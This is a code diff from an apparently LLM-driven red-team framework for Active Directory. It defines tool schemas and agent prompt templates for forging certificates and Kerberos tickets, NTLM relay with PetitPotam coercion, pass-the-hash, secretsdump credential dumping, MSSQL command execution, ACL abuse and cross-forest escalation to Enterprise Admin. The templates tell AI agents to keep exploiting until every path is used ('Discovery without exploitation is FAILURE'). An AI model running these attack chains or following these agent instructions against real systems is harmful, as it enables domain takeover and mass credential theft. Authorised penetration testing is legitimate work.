certificate template name to mimic. Defaults to a generic client-auth template." + }, + "out": { + "type": "string", + "description": "Output filename for the forged PFX. Auto-generated if omitted (forged__.pfx)." + } + }, + "required": ["ca_pfx", "upn"] + }), + }, + ToolDefinition { + name: "certipy_retrieve".into(), + description: "Retrieve a previously issued certificate from the CA by its request ID. \ + Used after certipy_ca -issue-request approves a pending request." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name" + }, + "request_id": { + "type": "integer", + "description": "The certificate request ID to retrieve" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for RPC enrollment" + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca", "request_id"] + }), + }, + ToolDefinition { + name: "certipy_relay".into(), + description: "Start a Certipy relay listener for ADCS certificate enrollment via \ + relay attacks. Supports HTTP relay (ESC8) and RPC relay (ESC11). \ + For ESC8: target=http://ca-host. For ESC11: target=rpc://ca-host." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": { + "type": "string", + "description": "Relay target URL. Use 'http://' for ESC8 (HTTP web enrollment relay) or 'rpc://' for ESC11 (RPC certificate enrollment relay)." + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "template": { + "type": "string", + "description": "Certificate template to request during relay. Optional — defaults to Machine for HTTP or uses the CA's default." + } + }, + "required": ["target", "ca"] + }), + }, + ToolDefinition { + name: "certipy_esc7_full_chain".into(), + description: "Execute the full ESC7 exploit chain: add yourself as CA officer \ + (ManageCA abuse), request a SubCA certificate (gets denied), issue the pending \ + request, retrieve the certificate, and authenticate to obtain NT hashes. \ + Requires the user to have ManageCA rights on the target CA." + .into(), + input_schema: json!({ + "type": "object", + "properties": { + "domain": { + "type": "string", + "description": "Target domain (e.g. contoso.local)" + }, + "username": { + "type": "string", + "description": "Username for authentication (must have ManageCA rights)" + }, + "password": { + "type": "string", + "description": "Password for authentication" + }, + "dc_ip": { + "type": "string", + "description": "Domain controller IP address" + }, + "ca": { + "type": "string", + "description": "Certificate Authority name (e.g. 'CONTOSO-CA')" + }, + "target": { + "type": "string", + "description": "CA server IP or hostname for certificate enrollment. REQUIRED when the CA is on a different host than the DC." + }, + "upn": { + "type": "string", + "description": "UPN of the user to impersonate. Defaults to 'administrator@'.", + "default": "administrator" + }, + "sid": { + "type": "string", + "description": "SID to embed in the certificate (e.g. domain SID + '-500' for Administrator)" + } + }, + "required": ["domain", "username", "password", "dc_ip", "ca"] + }), + }, ] } diff --git a/ares-llm/src/tool_registry/privesc/tickets.rs b/ares-llm/src/tool_registry/privesc/tickets.rs index 47666a60..ccb6ff4f 100644 --- a/ares-llm/src/tool_registry/privesc/tickets.rs +++ b/ares-llm/src/tool_registry/privesc/tickets.rs @@ -64,10 +64,6 @@ pub fn definitions() -> Vec { "hash": { "type": "string", "description": "NTLM hash for pass-the-hash authentication (e.g. aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0). Use this OR password." - }, - "target_domain": { - "type": "string", - "description": "Parent domain FQDN (auto-detected from child if omitted)" } }, "required": ["child_domain", "username"] @@ -92,7 +88,11 @@ pub fn definitions() -> Vec { }, "password": { "type": "string", - "description": "Password for authentication" + "description": "Password for authentication (use this OR hash, must be non-empty)" + }, + "hash": { + "type": "string", + "description": "NTLM hash for pass-the-hash authentication (LM:NT or NT-only). Use this OR password." }, "dc_ip": { "type": "string", @@ -103,7 +103,7 @@ pub fn definitions() -> Vec { "description": "The trusted domain to extract the trust key for (e.g. fabrikam.local)" } }, - "required": ["domain", "username", "password", "dc_ip", "trusted_domain"] + "required": ["domain", "username", "dc_ip", "trusted_domain"] }), }, ToolDefinition { @@ -140,6 +140,14 @@ pub fn definitions() -> Vec { "description": "Username to embed in the ticket. Defaults to Administrator.", "default": "Administrator" }, + "extra_sid": { + "type": "string", + "description": "Extra SID to embed (e.g. '-519' for Enterprise Admins). Use for child-to-parent escalation within the same forest. OMIT for cross-forest trusts — SID filtering blocks RIDs < 1000." + }, + "aes_key": { + "type": "string", + "description": "AES256 trust key (hex, 64 chars). REQUIRED for Windows Server 2016+ target DCs — RC4-only inter-realm tickets are rejected with KDC_ERR_TGT_REVOKED. Extract alongside the NT hash via extract_trust_key (look for ':aes256-cts-hmac-sha1-96:' line)." + }, "duration": { "type": "integer", "description": "Ticket duration in days. Defaults to 3650.", diff --git a/ares-llm/src/tool_registry/recon.rs b/ares-llm/src/tool_registry/recon.rs index 3105f70b..e7b1f4cd 100644 --- a/ares-llm/src/tool_registry/recon.rs +++ b/ares-llm/src/tool_registry/recon.rs @@ -117,18 +117,22 @@ pub(super) fn tool_definitions() -> Vec { }, ToolDefinition { name: "ldap_search".into(), - description: "Execute an LDAP search query against a domain controller.".into(), + description: "Execute an LDAP search query against a domain controller. When authenticating with credentials from a different domain (e.g. child domain cred against parent DC), set bind_domain to the credential's domain.".into(), input_schema: json!({ "type": "object", "properties": { "target": {"type": "string", "description": "DC IP or hostname"}, - "domain": {"type": "string"}, + "domain": {"type": "string", "description": "Target domain (used for LDAP base DN)"}, "username": {"type": "string"}, "password": {"type": "string"}, "filter": {"type": "string", "description": "LDAP filter (e.g. '(objectClass=user)')"}, "attributes": { "type": "string", "description": "Comma-separated attributes to retrieve" + }, + "bind_domain": { + "type": "string", + "description": "Domain for LDAP bind DN (user@bind_domain). Use when credential domain differs from target domain (e.g. child-domain cred authenticating to parent DC). If omitted, uses 'domain'." } }, "required": ["target", "domain", "filter"] @@ -136,15 +140,16 @@ pub(super) fn tool_definitions() -> Vec { }, ToolDefinition { name: "rpcclient_command".into(), - description: "Execute an rpcclient command against a target.".into(), + description: "Execute an rpcclient command against a target. Supports pass-the-hash via the 'hash' parameter.".into(), input_schema: json!({ "type": "object", "properties": { "target": {"type": "string"}, - "command": {"type": "string", "description": "rpcclient command (e.g. 'enumdomusers')"}, + "command": {"type": "string", "description": "rpcclient command (e.g. 'enumdomusers', 'enumdomgroups', 'querygroupmem ')"}, "username": {"type": "string"}, "password": {"type": "string"}, - "domain": {"type": "string"} + "domain": {"type": "string"}, + "hash": {"type": "string", "description": "NTLM hash for pass-the-hash authentication (use instead of password)"} }, "required": ["target", "command"] }), @@ -256,5 +261,24 @@ pub(super) fn tool_definitions() -> Vec { "required": ["target"] }), }, + ToolDefinition { + name: "ldap_acl_enumeration".into(), + description: "Enumerate ACL attack paths by querying nTSecurityDescriptor attributes on AD objects. Identifies dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, GenericWrite, WriteOwner, Self-Membership) that can be exploited for privilege escalation. Supports pass-the-hash via the 'hash' parameter.".into(), + input_schema: json!({ + "type": "object", + "properties": { + "target": {"type": "string", "description": "DC IP or hostname"}, + "domain": {"type": "string", "description": "Target domain"}, + "username": {"type": "string"}, + "password": {"type": "string"}, + "hash": {"type": "string", "description": "NTLM hash for pass-the-hash (use instead of password)"}, + "bind_domain": { + "type": "string", + "description": "Domain for LDAP bind DN when credential domain differs from target domain" + } + }, + "required": ["target", "domain"] + }), + }, ] } diff --git a/ares-llm/templates/redteam/agents/acl.md.tera b/ares-llm/templates/redteam/agents/acl.md.tera index 8fbe7438..a6dce7f2 100644 --- a/ares-llm/templates/redteam/agents/acl.md.tera +++ b/ares-llm/templates/redteam/agents/acl.md.tera @@ -41,7 +41,8 @@ When you have these permissions on a user/computer: 1. **Shadow Credentials** (BEST - one step to hash) ``` - pywhisker(target_samaccountname="targetuser", domain="contoso.local", username="user", password="pass", dc_ip="192.168.58.10") + pywhisker(target_samaccountname="targetuser", domain="contoso.local", username="user", dc_ip="192.168.58.10") + → Worker injects credential for `user@contoso.local` from operation state → Use generated PFX with certipy_auth (from PrivEsc) to get NTLM hash ``` diff --git a/ares-llm/templates/redteam/agents/coercion.md.tera b/ares-llm/templates/redteam/agents/coercion.md.tera index 887c6fbc..b08c2a31 100644 --- a/ares-llm/templates/redteam/agents/coercion.md.tera +++ b/ares-llm/templates/redteam/agents/coercion.md.tera @@ -111,12 +111,41 @@ dfscoerce( ## Relay Attack Coordination -### For ADCS ESC8 -You handle the full ESC8 attack chain: -1. Start `ntlmrelayx_to_adcs(ca_host="ca.contoso.local", attacker_ip="YOUR_IP")` -2. Run `petitpotam(target="dc.contoso.local", listener="YOUR_IP")` to coerce DC -3. DC authenticates to relay, relay requests certificate from CA -4. Certificate is saved, use `certipy_auth` (on privesc) to get NTLM hash +### For ADCS ESC8 — USE `relay_and_coerce` +**Preferred:** make ONE deterministic call — do not orchestrate ntlmrelayx + petitpotam manually. The composite tool starts the relay, runs **unauthenticated PetitPotam first** (works on unpatched DCs without any creds), then optionally falls back to **DFSCoerce (MS-DFSNM)**, then to coercer over MS-EFSR/MS-RPRN if creds are supplied. It emits a `certificate_obtained` vulnerability that triggers `certipy_auth` automatically. + +**CRITICAL — source ≠ target.** `coerce_target` MUST be a different host than `ca_host`. Windows NTLM same-machine loopback protection blocks relayed auth when the coerced machine is the relay target. Coerce a DC (or other reachable machine) and relay it to the CA. Coercing the CA back to itself is dead. + +**Default — unauth (try this FIRST, no creds needed):** +``` +relay_and_coerce( + ca_host="ca.contoso.local", # ADCS web enrollment host + coerce_target="dc01.contoso.local", # DIFFERENT host to coerce (not ca_host!) + attacker_ip="YOUR_IP", + template="DomainController" +) +``` + +**With creds (only add if unauth fails or DC is known patched):** +``` +relay_and_coerce( + ca_host="ca.contoso.local", + coerce_target="dc01.contoso.local", # MUST differ from ca_host + attacker_ip="YOUR_IP", + coerce_user="user", # Account to RPC the target machine + coerce_domain="user.realm", # User's home realm + template="DomainController" +) +``` +-> Worker injects `coerce_password` or `coerce_hash` for `(coerce_user, coerce_domain)` from state — never pass them yourself. + +Cross-forest case: `coerce_user` lives in the child realm; `coerce_target` is the parent DC (or another parent-realm machine). The captured cert is for that machine's account — `certipy_auth` will PKINIT into the parent realm and extract the hash. **Try unauth first — most lab DCs are unpatched against PetitPotam.** + +**Fallback (only if `relay_and_coerce` is unavailable):** +1. `ntlmrelayx_to_adcs(ca_host=..., attacker_ip=...)` +2. `petitpotam(target=..., listener=...)` or `dfscoerce(...)` +3. Wait for cert capture +4. Manually report cert path so privesc can run `certipy_auth` ### For LDAP Relay ``` @@ -192,7 +221,8 @@ Combine mitm6 with ntlmrelayx to create computer account: |------|----------| | ntlmrelayx_to_smb | Relay to SMB for psexec/secretsdump | | ntlmrelayx_to_ldaps | Relay to LDAPS (RBCD, delegate-access) | -| ntlmrelayx_to_adcs | Relay to ADCS web enrollment (ESC8) | +| ntlmrelayx_to_adcs | Relay to ADCS web enrollment (ESC8) — prefer `relay_and_coerce` | +| relay_and_coerce | **Composite ESC8: starts relay + coerces DC + emits cert vuln in one call** | | ntlmrelayx_multirelay | Multi-target relay with targets file | ## Hash Types Captured diff --git a/ares-llm/templates/redteam/agents/lateral.md.tera b/ares-llm/templates/redteam/agents/lateral.md.tera index 8793586c..374b7d47 100644 --- a/ares-llm/templates/redteam/agents/lateral.md.tera +++ b/ares-llm/templates/redteam/agents/lateral.md.tera @@ -42,45 +42,49 @@ Your role is to move through the network and extract credentials from compromise ### Method Priority Order +> **Credentials.** Call shapes below are principal-only. The worker resolves +> the password, hash, AES key, or ticket for `(username, domain)` from +> operation state at dispatch — never include `password`, `hash`, +> `ticket_path`, `aes_key`, or other secret fields yourself. + 1. **psexec** - Most reliable for admins - If psexec fails with "access denied", you don't have admin rights on the target - - Prefer pass-the-hash when available + - Worker auto-selects PTH vs password auth based on what's in state ``` - psexec(target="192.168.58.10", username="admin", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") - psexec(target="192.168.58.10", username="admin", password="P@ssw0rd!", domain="contoso.local") + psexec(target="192.168.58.10", username="admin", domain="contoso.local") ``` 2. **evil-winrm** - Works if WinRM enabled (check 5985/5986 first) ``` - evil_winrm(target="192.168.58.10", username="admin", hash="31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") - evil_winrm(target="192.168.58.10", username="admin", password="P@ssw0rd!", domain="contoso.local") + evil_winrm(target="192.168.58.10", username="admin", domain="contoso.local") ``` 3. **wmi/smbexec** - Alternate methods ``` - wmiexec(target="192.168.58.10", username="admin", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") - smbexec(target="192.168.58.10", username="admin", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") + wmiexec(target="192.168.58.10", username="admin", domain="contoso.local") + smbexec(target="192.168.58.10", username="admin", domain="contoso.local") ``` ### Pass-the-Hash -When you have NTLM hash instead of password, use the format `LM:NT` or just `NT`: +When the worker has only an NTLM hash for the principal, it auto-selects PTH — +no schema change on your side: ``` -psexec(target="dc01.contoso.local", username="administrator", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") -evil_winrm(target="dc01.contoso.local", username="administrator", hash="31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") -wmiexec(target="dc01.contoso.local", username="administrator", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") +psexec(target="dc01.contoso.local", username="administrator", domain="contoso.local") +evil_winrm(target="dc01.contoso.local", username="administrator", domain="contoso.local") +wmiexec(target="dc01.contoso.local", username="administrator", domain="contoso.local") ``` ### Pass-the-Ticket -When you have a Kerberos ticket (ccache file), use the `_kerberos` variants: +When you have a Kerberos ticket (ccache file), use the `_kerberos` variants — +the worker resolves the most recent ccache for the principal from disk: ``` -# If you already have a .ccache file from S4U/delegation/ADCS attack: -psexec_kerberos(target="dc01.contoso.local", ticket_file="/tmp/administrator.ccache") -wmiexec_kerberos(target="dc01.contoso.local", ticket_file="/tmp/administrator.ccache") -secretsdump_kerberos(target="dc01.contoso.local", ticket_file="/tmp/administrator.ccache") +psexec_kerberos(target="dc01.contoso.local", username="administrator", domain="contoso.local") +wmiexec_kerberos(target="dc01.contoso.local", username="administrator", domain="contoso.local") +secretsdump_kerberos(target="dc01.contoso.local", username="administrator", domain="contoso.local") # If you need to request a TGT first: -get_tgt(username="admin", hash="31d6cfe0d16ae931b73c59d7e0c089c0", domain="contoso.local") -# → Creates /tmp/admin.ccache, then use it with the _kerberos tools +get_tgt(username="admin", domain="contoso.local") +# → Creates a ccache for admin@contoso.local; subsequent _kerberos tools pick it up. ``` Use Kerberos when: @@ -94,14 +98,11 @@ Use Kerberos when: ### Secretsdump (Primary Method) After gaining access to a host, **immediately run secretsdump**: ``` -# With password: -secretsdump(target="192.168.58.10", domain="contoso.local", username="admin", password="P@ssw0rd!") - -# With hash (pass-the-hash): -secretsdump(target="192.168.58.10", domain="contoso.local", username="admin", hash="aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0") +# Worker auto-selects password / hash / ticket based on what's in state for (username, domain): +secretsdump(target="192.168.58.10", domain="contoso.local", username="admin") -# With Kerberos ticket: -secretsdump_kerberos(target="dc01.contoso.local", ticket_file="/tmp/administrator.ccache") +# Force Kerberos ticket auth (worker picks the most recent ccache for the principal): +secretsdump_kerberos(target="dc01.contoso.local", domain="contoso.local", username="administrator") ``` Extracts: diff --git a/ares-llm/templates/redteam/agents/orchestrator.md.tera b/ares-llm/templates/redteam/agents/orchestrator.md.tera index 37824ce3..063cf085 100644 --- a/ares-llm/templates/redteam/agents/orchestrator.md.tera +++ b/ares-llm/templates/redteam/agents/orchestrator.md.tera @@ -66,12 +66,13 @@ Your role is to **delegate tasks to specialized worker agents** and coordinate t - `dispatch_recon(target_ip="", domain="contoso.local", techniques=["bloodhound_collect"])` 2. **Dispatch Low-Hanging Fruit** (to CREDENTIAL_ACCESS worker) - - `dispatch_credential_access(technique="password_spray", target_ip="DC_IP", domain="contoso.local", username="", password="")` - - `dispatch_credential_access(technique="asrep_roast", target_ip="DC_IP", domain="contoso.local", username="", password="")` + - `dispatch_credential_access(technique="password_spray", target_ip="DC_IP", domain="contoso.local")` + - `dispatch_credential_access(technique="asrep_roast", target_ip="DC_IP", domain="contoso.local")` 3. **Dispatch Credential Expansion** (IMMEDIATELY when creds found) - - `dispatch_credential_access(technique="secretsdump", target_ip="DC_IP", domain="contoso.local", username="user", password="pass")` - - `dispatch_credential_access(technique="kerberoast", target_ip="DC_IP", domain="contoso.local", username="user", password="pass")` + - `dispatch_credential_access(technique="secretsdump", target_ip="DC_IP", domain="contoso.local", username="user")` + - `dispatch_credential_access(technique="kerberoast", target_ip="DC_IP", domain="contoso.local", username="user")` + - The dispatched worker resolves the credential for `username@domain` from operation state. 4. **Dispatch ADCS Enumeration** (when credentials available) - `dispatch_privesc_exploit(vuln_id="adcs_enum")` - Runs certipy_find diff --git a/ares-llm/templates/redteam/agents/privesc.md.tera b/ares-llm/templates/redteam/agents/privesc.md.tera index 37af0e0e..09313963 100644 --- a/ares-llm/templates/redteam/agents/privesc.md.tera +++ b/ares-llm/templates/redteam/agents/privesc.md.tera @@ -96,12 +96,17 @@ If you find yourself calling documentation tools more than attack tools, STOP an ### ESC1 - Enrollee Supplies Subject When ESC1 vulnerability is found: ``` -1. certipy_request(domain="contoso.local", username="user", password="pass", ca="CA-NAME", +1. certipy_request(domain="contoso.local", username="user", ca="CA-NAME", template="VulnTemplate", upn="administrator@contoso.local", dc_ip="DC_IP") 2. certipy_auth(domain="contoso.local", pfx_file="output.pfx", dc_ip="DC_IP") → Get Administrator NTLM hash ``` +> **Credentials.** All examples below show principal-only call shapes +> (`username`, `domain`). The worker resolves passwords/hashes/tickets/SIDs from +> operation state at dispatch — never include `password`, `hash`, `ticket_path`, +> `krbtgt_hash`, `domain_sid`, `trust_key`, or other secret fields yourself. + If RPC fails (ept_s_not_registered), coordinate with COERCION agent for ESC8 relay instead. ### ESC4 - Template Modification (Full Chain) @@ -110,7 +115,6 @@ When ESC4 vulnerability is found, use the full chain tool: certipy_esc4_full_chain( domain="contoso.local", username="user", - password="pass", template="VulnTemplate", ca="CA-NAME", target_user="administrator", @@ -150,7 +154,6 @@ For any user/computer you have GenericAll on: certipy_shadow( domain="contoso.local", username="youruser", - password="pass", target="targetuser", dc_ip="DC_IP" ) @@ -169,10 +172,10 @@ s4u_attack( impersonate="Administrator", domain="contoso.local", username="svc_account", - password="service_password", dc_ip="192.168.58.10" ) ``` +→ Worker injects the credential for `svc_account@contoso.local` from state. → Look for: "Saving ticket in Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache" **STEP 2: IMMEDIATELY use ticket with secretsdump_kerberos** @@ -181,10 +184,10 @@ secretsdump_kerberos( target="dc01.contoso.local", username="Administrator", domain="contoso.local", - ticket_path="Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache", dc_ip="192.168.58.10" ) ``` +→ Worker resolves the most recent ccache for `Administrator@contoso.local` from disk. → If target is DC: krbtgt hash = DOMAIN ADMIN → If target is DC: Administrator hash = DOMAIN ADMIN @@ -194,7 +197,6 @@ psexec_kerberos( target="dc01.contoso.local", username="Administrator", domain="contoso.local", - ticket_path="Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache", command="cmd /c whoami && hostname" ) ``` @@ -227,7 +229,6 @@ MSSQL is often a path to domain compromise through impersonation and linked serv mssql_enum_impersonation( target="sql.contoso.local", username="any_domain_user", - password="found_password", domain="CONTOSO.LOCAL" ) ``` @@ -245,7 +246,6 @@ b'LOGIN' b'' IMPERSONATE GRANT CONTOSO\your_user sa mssql_impersonate( target="sql.contoso.local", username="any_domain_user", - password="password", impersonate_user="sa", query="SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin')", domain="CONTOSO.LOCAL" @@ -260,7 +260,6 @@ mssql_impersonate( mssql_enable_xp_cmdshell( target="sql.contoso.local", username="any_domain_user", - password="password", domain="CONTOSO.LOCAL" ) ``` @@ -272,7 +271,6 @@ mssql_enable_xp_cmdshell( mssql_command( target="sql.contoso.local", username="any_domain_user", - password="password", command="whoami /priv", domain="CONTOSO.LOCAL" ) @@ -288,7 +286,6 @@ mssql_command( mssql_enum_linked_servers( target="sql.contoso.local", username="sql_svc", - password="found_password", domain="CONTOSO.LOCAL" ) ``` @@ -301,7 +298,6 @@ mssql_exec_linked( linked_server="remote-sql.fabrikam.local", query="SELECT SYSTEM_USER", username="sql_user", - password="password", domain="CONTOSO.LOCAL" ) ``` @@ -313,7 +309,6 @@ Force SQL server to authenticate to your listener: mssql_ntlm_coerce( target="sql.contoso.local", username="sql_user", - password="password", listener_ip="YOUR_IP", domain="CONTOSO.LOCAL" ) @@ -328,7 +323,6 @@ When a child domain krbtgt hash is available: raise_child( child_domain="child.contoso.local", username="user", - password="pass", target_domain="contoso.local" ) → Enterprise Admin, then secretsdump parent DCs @@ -340,13 +334,12 @@ If raise_child fails, manually forge ticket with Enterprise Admin SID: 1. Get child domain SID: get_sid(domain="child.contoso.local", dc_ip="CHILD_DC_IP") 2. Get parent domain SID: get_sid(domain="contoso.local", dc_ip="PARENT_DC_IP") 3. generate_golden_ticket( - krbtgt_hash="aad3b435...", domain="child.contoso.local", - domain_sid="S-1-5-21-child...", user="Administrator", user_id=500, - extra_sids="S-1-5-21-parent...-519" # Enterprise Admins + extra_sid_rid=519 # Enterprise Admins ) + → Worker injects krbtgt_hash, domain_sid, and parent SID from state → Ticket valid in parent domain 4. Use ticket with psexec_kerberos/secretsdump_kerberos on parent DCs ``` @@ -361,18 +354,17 @@ When DA is achieved in one forest and a cross-forest trust exists: domain="contoso.local", dc_ip="DC_IP", target_domain="fabrikam.local", - username="Administrator", - password="pass" + username="Administrator" ) + → Worker injects the source DA credential from state → Gets FABRIKAM$ trust account NTLM hash 2. create_inter_realm_ticket( source_domain="contoso.local", - source_sid="S-1-5-21-source...", - trust_key="aad3b435...:ntlm_hash", target_domain="fabrikam.local", - target_sid="S-1-5-21-target..." + username="Administrator" ) + → Worker injects source_sid, target_sid, and trust_key from state → Forges inter-realm TGT 3. Use ticket for secretsdump against fabrikam.local DCs @@ -400,7 +392,7 @@ SweetPotato.exe -c "cmd /c whoami" ### RBCD Self-Relay For local privilege escalation via RBCD (requires ability to add computer): ``` -1. add_computer(domain="contoso.local", username="user", password="pass", dc_ip="DC_IP") +1. add_computer(domain="contoso.local", username="user", dc_ip="DC_IP") → Creates controlled machine account 2. rbcd_write(target_computer="YOURPC", delegate_from="YOURCONTROLLED$", ...) → Configure RBCD delegation diff --git a/ares-llm/templates/redteam/agents/system_instructions.md.tera b/ares-llm/templates/redteam/agents/system_instructions.md.tera index 7d339e6d..eb65e6e7 100644 --- a/ares-llm/templates/redteam/agents/system_instructions.md.tera +++ b/ares-llm/templates/redteam/agents/system_instructions.md.tera @@ -26,6 +26,44 @@ You are in an Active Directory environment with access to: - **EXPANDED ADCS**: ESC1-15 including certipy_template_esc4, ntlmrelayx_to_adcs, certipy_shadow - **EXPANDED DELEGATION**: s4u_attack, get_tgt +{% if listener_ip -%} +## 🛰️ OPERATOR INFRASTRUCTURE — YOUR LISTENER IP + +**Your listener / attacker IP is `{{ listener_ip }}`.** + +Use this exact value for every `listener_ip`, `attacker_ip`, or relay-listener +parameter you pass to a tool (PetitPotam, Coercer, dfscoerce, ntlmrelayx, +SearchConnector, MSSQL coerce, etc.). Do NOT guess subnet gateways +(`10.x.x.1`), do NOT use the target's own subnet base, and do NOT invent a +placeholder. If the tool schema requires a listener and you pick anything +other than `{{ listener_ip }}`, the coercion will time out unreachable. + +{% endif -%} +## 🔒 CRITICAL: CREDENTIAL HANDLING (READ THIS FIRST) + +**The dispatcher injects credentials at runtime — you do NOT pass them.** Tool +schemas EXCLUDE all secret fields (`password`, `nthash`, `aes256_key`, +`ticket_path`, `hashes`, `aesKey`, `pfx_password`, `coerce_password`, +`coerce_hash`, `trust_key`, `krbtgt_hash`, `domain_sid`, `target_sid`, +`source_sid`, `extra_sid`, `lm_hash`, `nt_hash`, `kerberos_keys`, `dpapi_key`). +Attempting to include them is a schema violation. + +**Reference principals by name only.** When you call a tool, supply the +non-secret coordinates: `target`, `username`, `domain`, `dc_ip`, `target_ip`, +`technique`, etc. The worker looks up the credential from operation state +based on `username` + `domain` and injects it before the tool runs. + +**If you don't see a credential field on a tool, that's intentional — do not +try to add it back, do not synthesize a placeholder like ``, +`[TGT]`, `password='N/A'`, or ``. There is no +way to override the auto-resolved credential, and any placeholder you invent +will be rejected as a hallucination.** + +If a tool fails because no credential is available for the named principal, +that means operation state is empty for that principal — source credentials +first (DCSync, kerberoast, password spray, ADCS escalation, etc.) and then +retry with the same principal name. + ## ⛔ CRITICAL: DO NOT SUMMARIZE UNTIL ALL PATHS EXPLOITED **Discovery without exploitation is FAILURE.** diff --git a/ares-llm/templates/redteam/tasks/acl_chain_step.md.tera b/ares-llm/templates/redteam/tasks/acl_chain_step.md.tera new file mode 100644 index 00000000..d6f6db4e --- /dev/null +++ b/ares-llm/templates/redteam/tasks/acl_chain_step.md.tera @@ -0,0 +1,89 @@ +## ACL Abuse Step: {{ task_id }} + +You are exploiting a discovered ACL edge against an Active Directory object. +The orchestrator has already resolved a credential that owns the right. + +**Credential injection contract (READ CAREFULLY):** + +- You MUST pass `username` and `domain` to every tool — those identify the + principal we authenticate as. Use the values shown in **Source principal** + below. Never pass a SID as `username`; always use the SAM account name. +- You MUST NOT pass `password`, `hash`, `nt_hash`, `aes_key`, `ticket_path`, + or any other secret material. The orchestrator injects those automatically + from state by `(username, domain)` immediately before tool dispatch. +- If you pass `password=...`, it will be stripped. If you omit `username` + or `domain`, secret injection cannot run and the tool will fail with + invalidCredentials. So: name the principal, leave the secret to us. + +{% if acl_type -%} +**ACL right:** `{{ acl_type }}` +{% endif -%} +{% if source_user -%} +**Source principal (we authenticate as this):** `{{ source_user }}`{% if source_domain %}@{{ source_domain }}{% endif %} +{% endif -%} +{% if target_user -%} +**Target object (we abuse the ACL against this):** `{{ target_user }}` +{% endif -%} +{% if domain -%} +**Domain:** `{{ domain }}` +{% endif -%} +{% if dc_ip -%} +**Domain controller IP (`dc_ip` argument):** `{{ dc_ip }}` +{% endif -%} +{% if vuln_id -%} +**Vuln ID (echo back when reporting):** `{{ vuln_id }}` +{% endif %} + +{% if step_json -%} +**Raw chain step (for context — may contain edge type / DN hints):** +```json +{{ step_json }} +``` +{% endif -%} + +### How to choose a tool + +Map the ACL right to the right exploit tool. All tools require `dc_ip` — use +the value above. Pass `target` as the SAM account name of the target object +(not its DN — the tools resolve DN themselves via LDAP). + +| ACL right | Tool to call | Effect | +|----------------------------------|-----------------------------------|-------------------------------------------------------| +| `forcechangepassword` | `bloodyad_set_password` | Reset target user's password to one we choose | +| `genericall` on a USER | `bloodyad_set_password` *or* `pywhisker` (shadow creds) | Take over user account | +| `genericall` on a GROUP | `bloodyad_add_group_member` | Add source principal (or chosen user) to the group | +| `genericwrite` on USER (no SPN) | `pywhisker` / `targeted_kerberoast` | Add msDS-KeyCredentialLink or set SPN + roast | +| `writeproperty` on USER | `pywhisker` *or* `targeted_kerberoast` | Write msDS-KeyCredentialLink or servicePrincipalName | +| `writeproperty` on GROUP (member attr) | `bloodyad_add_group_member` | Add source principal to the group | +| `allextendedrights` on USER | `bloodyad_set_password` *or* `pywhisker` | Equivalent to ForceChangePassword + DS-Replication | +| `addmember` / `addself` on GROUP | `bloodyad_add_group_member` | Add source principal to the group | +| `writedacl` | `dacl_edit` | Grant ourselves an actionable right, then chain | +| `writeowner` | `dacl_edit` (with `rights=WriteDacl`) | Note: ownership change needed first; if dacl_edit alone fails, report insufficient_context | +| `self_membership` / `write_membership` on a GROUP | `bloodyad_add_group_member` | Add source principal to the group | + +**Group targets:** when `target_user` resolves to a group (e.g. `Domain Admins`, +`DnsAdmins`, `Group Policy Creator Owners`, `Users`), use `bloodyad_add_group_member` +and add the source principal (`{{ source_user }}{% if source_domain %}@{{ source_domain }}{% endif %}`) +or another principal you control. Do NOT call `bloodyad_set_password` on a group. + +**Validate after exploit:** if you reset a password, immediately call +`smb_login_check` against `{{ dc_ip }}` to confirm the new credential works. +If you added group membership, the new privilege is live on the next Kerberos +auth — call `domain_admin_checker` to confirm DA reach (when relevant). + +### Reporting + +Call `report_finding` with the new credential or membership change so the +orchestrator can chain follow-on tasks. Then call `task_complete` summarising +the result (success/failure + observed evidence). Echo `vuln_id` if present. + +If the payload truly lacks the data you need (no `target_user`, no `dc_ip`), +call `task_complete` with status=`insufficient_context` and explain what was +missing — do NOT call `request_assistance`; the orchestrator can re-derive +context only from a structured failure report. + +{% if state_context %} +## Current Operation State + +{{ state_context }} +{% endif -%} diff --git a/ares-llm/templates/redteam/tasks/credaccess_fallback.md.tera b/ares-llm/templates/redteam/tasks/credaccess_fallback.md.tera index 908fa2e7..d61a21ff 100644 --- a/ares-llm/templates/redteam/tasks/credaccess_fallback.md.tera +++ b/ares-llm/templates/redteam/tasks/credaccess_fallback.md.tera @@ -3,7 +3,7 @@ Domain: {{ domain }} Targets: {{ targets_display }} DC IP: {{ dc_ip_display }} Username: {{ user_display }} -Credential ({{ cred_type }}): {{ cred_value }} +Auth: {{ cred_type }} (auto-resolved at dispatch — do NOT pass password/hash/ticket fields) {% if hash_type -%} Hash Type: {{ hash_type }} {% endif -%} @@ -20,7 +20,7 @@ Task ID: {{ task_id }} {{ hash_note }} {% endif -%} -Use the exact credential value above; do not substitute placeholders. If DC IP is provided, pass -dc-ip to Kerberos/LDAP 